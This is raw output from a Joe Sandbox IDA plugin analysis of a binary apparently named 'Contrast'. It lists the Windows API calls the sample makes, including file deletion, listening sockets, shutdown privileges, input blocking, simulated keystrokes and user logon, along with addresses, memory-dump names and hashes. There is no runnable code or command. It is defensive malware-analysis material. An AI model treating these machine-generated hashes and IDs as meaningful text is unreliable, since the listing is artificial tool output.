                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00573D96
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00573E3E
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00573E51
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00573E6E
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00573E90
                                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00573EAC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 4002782344-1173974218
                                                                                                                                        • Opcode ID: fd73370eab77b991cca6042bc91b6001ad3d728026553a297eeedfc9313b5921
                                                                                                                                        • Instruction ID: 238407e7471a56dae57afa1912f1ee6710c7035860d055420a97b2b36dec2973
                                                                                                                                        • Opcode Fuzzy Hash: fd73370eab77b991cca6042bc91b6001ad3d728026553a297eeedfc9313b5921
                                                                                                                                        • Instruction Fuzzy Hash: 8251943580015E9ACF15EBA0EA569EEBB79BF61310F204165F846B31D1EB315F0DEB60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0057FA83
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057FB96
                                                                                                                                          • Part of subcall function 005152B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005152E6
                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0057FAB3
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057FAC7
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057FAE2
                                                                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 0057FB80
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 2185952417-438819550
                                                                                                                                        • Opcode ID: 2182757530b54baf0dcd0dccfb5dfc8f24c9836e561ac5f93479ed274fe1ffd6
                                                                                                                                        • Instruction ID: f3274901825b6d1805ab3e412c73a6b9b0c085476986585435e02bcdbad5f7a8
                                                                                                                                        • Opcode Fuzzy Hash: 2182757530b54baf0dcd0dccfb5dfc8f24c9836e561ac5f93479ed274fe1ffd6
                                                                                                                                        • Instruction Fuzzy Hash: 3F419F7190021A9FCF14DF64DC59AEEBFB4FF19310F148466E818A2290EB309E84DB90
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00569399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005693E3
                                                                                                                                          • Part of subcall function 00569399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00569410
                                                                                                                                          • Part of subcall function 00569399: GetLastError.KERNEL32 ref: 0056941D
                                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 005757B4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                                                                        • API String ID: 2234035333-194228
                                                                                                                                        • Opcode ID: d88fd8097f284b0c89559c43766cd455cb5291b66ee93e47ab83ac32a56cfef5
                                                                                                                                        • Instruction ID: fa1affca8a1a78ade831290134af596b55941ac8f4e10f6049a8ce7b0ba3980a
                                                                                                                                        • Opcode Fuzzy Hash: d88fd8097f284b0c89559c43766cd455cb5291b66ee93e47ab83ac32a56cfef5
                                                                                                                                        • Instruction Fuzzy Hash: 6A01D431650712EAE76C62A4BC8BBBA7F5CFB057D0F248929F81BD20D2F9905C04A160
                                                                                                                                        APIs
                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 005869C7
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 005869D6
                                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 005869F2
                                                                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00586A01
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00586A1B
                                                                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00586A2F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279440585-0
                                                                                                                                        • Opcode ID: 9bcbd72bdf93525b05ba4eb261f048cefd49efa3436c02a2e347e7fedadf26c4
                                                                                                                                        • Instruction ID: 9371eddda08aa659897f3089d90104bc96b7e0ab9b8edc07d16ffc930b5113e9
                                                                                                                                        • Opcode Fuzzy Hash: 9bcbd72bdf93525b05ba4eb261f048cefd49efa3436c02a2e347e7fedadf26c4
                                                                                                                                        • Instruction Fuzzy Hash: AC21D070600606DFDB00FF64D889A6EBBA9FF89720F108559E856B73D1CB70AC45DB90
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                                                                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00511DD6
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00511E2A
                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00511E3D
                                                                                                                                          • Part of subcall function 0051166C: DefDlgProcW.USER32(?,00000020,?), ref: 005116B4
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: ColorProc$LongWindow
• String ID:
• API String ID: 3744519093-0
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0057C329
• _wcscmp.LIBCMT ref: 0057C359
• _wcscmp.LIBCMT ref: 0057C36E
• FindNextFileW.KERNEL32(00000000,?), ref: 0057C37F
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0057C3AF
Similarity
• API ID: Find$File_wcscmp$CloseFirstNext
• String ID:
• API String ID: 2387731787-0
APIs
  • Part of subcall function 00588475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005884A0
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00586E89
• WSAGetLastError.WSOCK32(00000000), ref: 00586EB2
• bind.WSOCK32(00000000,?,00000010), ref: 00586EEB
• WSAGetLastError.WSOCK32(00000000), ref: 00586EF8
• closesocket.WSOCK32(00000000,00000000), ref: 00586F0C
Similarity
• API ID: ErrorLast$bindclosesocketinet_addrsocket
• String ID:
• API String ID: 99427753-0
APIs
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
APIs
Strings
Similarity
• API ID: LocalTime__swprintf
• String ID: %.3d$WIN_XPe
• API String ID: 2070861257-2409531811
APIs
• InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00581ED6,00000000), ref: 00582AAD
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00582AE4
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
APIs
  • Part of subcall function 00530FE6: std::exception::exception.LIBCMT ref: 0053101C
  • Part of subcall function 00530FE6: __CxxThrowException@8.LIBCMT ref: 00531031
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005693E3
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00569410
• GetLastError.KERNEL32 ref: 0056941D
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00574271
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 005742B2
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 005742BD
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 33631002-0
                                                                                                                                        • Opcode ID: 1f7007f50ccbf2390d805a7d42f9f42b7df152291efea8a8b43646ddcf007ebc
                                                                                                                                        • Instruction ID: b20ee65bf7f7dee4c9a23d7cb1a33bab5c67149d95b722e0f6417ecb94044b2d
                                                                                                                                        • Opcode Fuzzy Hash: 1f7007f50ccbf2390d805a7d42f9f42b7df152291efea8a8b43646ddcf007ebc
                                                                                                                                        • Instruction Fuzzy Hash: 5F115E75E01228BFDB108FA5EC44BAFBFBCEB45B60F108156FD08E7290C6705A059BA1
                                                                                                                                        APIs
                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00574F45
                                                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00574F5C
                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 00574F6C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3429775523-0
                                                                                                                                        • Opcode ID: 32aacb0a264b88d606d3689b4bc439399ed78854bdc4c4986ca4f81b55300d1a
                                                                                                                                        • Instruction ID: 1c1ee73086f3276e8fde926943583e117586b7cb0c20c7e3f85de1bfb35ea8de
                                                                                                                                        • Opcode Fuzzy Hash: 32aacb0a264b88d606d3689b4bc439399ed78854bdc4c4986ca4f81b55300d1a
                                                                                                                                        • Instruction Fuzzy Hash: DCF03775A1120CBFDB00DFE09C89AAEBBB8FB08301F4044A9A901E2280E7346A089B50
                                                                                                                                        APIs
                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00571B01
                                                                                                                                        • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00571B14
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3536248340-0
                                                                                                                                        • Opcode ID: 7046bbab83259e1cd36bcbac35d3db46eca683a1612d06670ae2623bcbd4446f
                                                                                                                                        • Instruction ID: ad67c398e3eb7638e99d144ff047f7f85824877a27f3a70f606631fef3c4f2c3
                                                                                                                                        • Opcode Fuzzy Hash: 7046bbab83259e1cd36bcbac35d3db46eca683a1612d06670ae2623bcbd4446f
                                                                                                                                        • Instruction Fuzzy Hash: CDF0497191020DABDB14CFA4D805BFE7BB4FF18315F00804AF95996292D3799615EF94
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00589B52,?,005A098C,?), ref: 0057A6DA
                                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00589B52,?,005A098C,?), ref: 0057A6EC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3479602957-0
                                                                                                                                        • Opcode ID: a5df0effaf1d4c5cb57c96a64973e2aa3ba86d741d70014b881dd34c4b04d51b
                                                                                                                                        • Instruction ID: b6792a9f221b81e599a47165a5b501224a797ac6dd229ec1e27cb9fa3141319b
                                                                                                                                        • Opcode Fuzzy Hash: a5df0effaf1d4c5cb57c96a64973e2aa3ba86d741d70014b881dd34c4b04d51b
                                                                                                                                        • Instruction Fuzzy Hash: A8F0823551422EBBDB20AFA4DC48FEA7B6CFF19761F008156B91896181D6309944DBE1
                                                                                                                                        APIs
                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00568F27), ref: 00568DFE
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00568F27), ref: 00568E10
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 81990902-0
                                                                                                                                        • Opcode ID: 720df7b23e4d143ab3911b14ec81c0f803c68a716dcef42629b472d7b1bcd597
                                                                                                                                        • Instruction ID: cc85d22df4e0d7444a520897f4a5b7aa870617fea3038aff1c3317cbb732ff23
                                                                                                                                        • Opcode Fuzzy Hash: 720df7b23e4d143ab3911b14ec81c0f803c68a716dcef42629b472d7b1bcd597
                                                                                                                                        • Instruction Fuzzy Hash: F7E0BF75014611EFE7252B60EC0DD777BADFB04311B148919F455804B0DB626C94DB50
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00538F87,?,?,?,00000001), ref: 0053A38A
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0053A393
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                        • Opcode ID: 664a5a75ae3dfc09ab23da50a4b997cf7ff40be1ac79b3a683e3e545b68532f2
                                                                                                                                        • Instruction ID: 2c49651d7f6070359c07edbd84189f3a7dbf0addc6df89960c80203f11c136ba
                                                                                                                                        • Opcode Fuzzy Hash: 664a5a75ae3dfc09ab23da50a4b997cf7ff40be1ac79b3a683e3e545b68532f2
                                                                                                                                        • Instruction Fuzzy Hash: B2B09231074208ABCE402B91EC19B883F68EB56BA2F005412F60D440A0CBA25454AA91
                                                                                                                                        APIs
                                                                                                                                        • BlockInput.USER32(00000001), ref: 005845F0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BlockInput
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3456056419-0
                                                                                                                                        • Opcode ID: 5d04e9533fc0d975a234a95a60c5c915f568694aa8481e12b05fa99bda6ab492
                                                                                                                                        • Instruction ID: e93a91ffe2d9c91be8f1ea8bec6691a13d7b1221d3569b896ccdabc7471c7f18
                                                                                                                                        • Opcode Fuzzy Hash: 5d04e9533fc0d975a234a95a60c5c915f568694aa8481e12b05fa99bda6ab492
                                                                                                                                        • Instruction Fuzzy Hash: CCE04F752106169FD710BF99E808A9AFBE8BF99760F00841AFC49D7351EA70F9418FA1
                                                                                                                                        APIs
                                                                                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00575205
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: mouse_event
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2434400541-0
                                                                                                                                        • Opcode ID: ae62e0d41aeda2f7e6563820afb2a803f2afc89317c06bd6bed36606ce021389
                                                                                                                                        • Instruction ID: a0a5e9552a46d29981918b1818da970c818451f8460cb2970599ad76a0ae908b
                                                                                                                                        • Opcode Fuzzy Hash: ae62e0d41aeda2f7e6563820afb2a803f2afc89317c06bd6bed36606ce021389
• Instruction Fuzzy Hash: EED06CE5262A0A69ED984724AA1FF761A08B3457C2FD4DA49718A890C2B8D46886F921
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00568FA7), ref: 00569389
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
• Opcode ID: 4b6f3a062dce57443aba8028b2365d32bbbea68a8aa13f3c1cf38c81b19b9540
• Instruction ID: 1e383b6dd9f94d3105d9021ff0fb5bba74ed22417ea444535737a5da9b24b108
• Opcode Fuzzy Hash: 4b6f3a062dce57443aba8028b2365d32bbbea68a8aa13f3c1cf38c81b19b9540
• Instruction Fuzzy Hash: 10D05E322A050EABEF018EA4DC05EAE3B69EB04B01F808111FE15C50A0C775E835AB60
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00550734
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 783c353837b004930bbfed6862e98ded46af42b1f86cad700ac550f588bfbf81
• Instruction ID: 73cd55c616412ab27854aa287d3b0cbcf45fd15a54a1449169ff81de96cdaf03
• Opcode Fuzzy Hash: 783c353837b004930bbfed6862e98ded46af42b1f86cad700ac550f588bfbf81
• Instruction Fuzzy Hash: D3C04CF181010DDBCB05DBA0DA9CEFE7BBCBB04305F501456A505B2190D7749B489A71
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0053A35A
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 562cb6d914b914e197e0482dd089c50fc3edda9a039f02feaa69da2f7624f206
• Instruction ID: 9586ae2843f6e5dcfa8b43e780edaa2ffe0491223b175c712bc3c9715dc840b5
• Opcode Fuzzy Hash: 562cb6d914b914e197e0482dd089c50fc3edda9a039f02feaa69da2f7624f206
